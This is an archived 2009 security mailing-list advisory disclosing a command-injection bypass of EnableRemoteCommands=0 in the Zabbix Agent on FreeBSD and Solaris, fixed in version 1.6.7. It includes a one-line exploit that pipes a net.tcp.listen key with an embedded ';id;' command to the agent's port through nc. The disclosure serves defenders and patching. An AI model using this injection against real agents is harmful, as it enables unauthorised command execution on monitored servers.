lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 13 Dec 2009 16:28:30 +0100
From: Nicob <>
Subject: Zabbix Agent : Bypass of EnableRemoteCommands=0

>>From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."

	[Zabbix Agent : Bypass of EnableRemoteCommands=0]

Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference :
Patched version : 1.6.7

Faulty source code : function NET_TCP_LISTEN() in

Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address

Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents


Powered by blists - more mailing lists